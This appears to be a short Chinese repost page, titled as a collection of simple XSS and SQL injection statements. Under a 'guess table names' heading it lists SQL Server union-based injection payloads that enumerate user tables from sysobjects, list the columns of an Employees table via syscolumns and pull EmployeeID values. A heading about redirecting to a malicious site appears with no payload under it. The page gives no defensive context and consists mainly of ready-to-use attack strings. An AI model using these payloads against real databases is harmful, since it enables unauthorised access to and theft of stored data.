读书人

简略的XSS与SQL注入语句

发布时间: 2012-07-01 13:15:00 作者: rapoo

简单的XSS与SQL注入语句
跳转至恶意站点



猜表名

' union select name from sysobjects where xtype='U' --' union select name from sysobjects where xtype='U'and name > 'Categories' --' union select name from syscolumns where id = OBJECT_ID('Employees') and name>'Address'--' union select EmployeeID from Employees --

读书人网 >SQL Server

热点推荐